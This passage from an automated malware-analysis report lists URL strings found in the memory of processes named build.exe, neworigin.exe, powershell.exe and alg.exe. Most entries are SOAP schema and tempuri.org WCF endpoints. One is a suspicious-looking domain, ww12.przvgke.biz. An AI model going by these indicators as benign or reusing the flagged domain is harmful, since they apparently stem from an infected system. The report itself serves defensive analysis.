Source: powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: neworigin.exe, 0000000D.00000002.3160951501.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1970664669.0000000004661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: powershell.exe, 00000012.00000002.1970664669.00000000047B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id16Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id17Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id18Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id19Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id20Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id21Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id22Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id23Response
Source: build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id24Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id4Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id5Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id6Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id7Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id8Response
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9LR
Source: build.exe, 0000000E.00000002.3157802267.0000000003103000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000031A0000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000003152000.00000004.00000800.00020000.00000000.sdmp, build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id9Response
Source: build.exe, 0000000E.00000002.3157802267.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/x
Source: alg.exe, 00000007.00000003.1991584443.000000000059E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww12.przvgke.biz
